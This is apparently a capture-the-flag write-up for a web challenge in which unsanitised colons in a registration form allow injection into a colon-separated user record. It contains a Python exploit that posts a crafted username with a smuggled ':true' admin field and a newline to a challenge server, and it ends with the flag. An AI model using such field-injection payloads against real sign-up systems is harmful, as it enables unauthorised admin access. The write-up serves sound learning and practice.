Rating:
In this challenge you should register a new user as admin. Both inputs aren't sanitized for the colon char, which is also used for serializing the ACL:
```
def _pack_data(data_dict):
"""
Pack data with data_structure.
"""
return '{}:{}:{}'.format(
data_dict['username'],
data_dict['password'],
data_dict['admin']
)
```
Simple exploit in python (user=fearless with pass=12345):
```
import requests
data = {
'username': 'fearless:12345:true\ntest',
'password': 'test'
}
r = requests.post('http://35.198.113.131:7060/register', data = data)
print r.text
```
Then you can simply login at the main (index) page.
Note: This challenge contains a bug - after adding a new user, the server must be restarted to read new registered users...
The flag:
```
evlz{T#3_W34K_$N4K3}ctf
```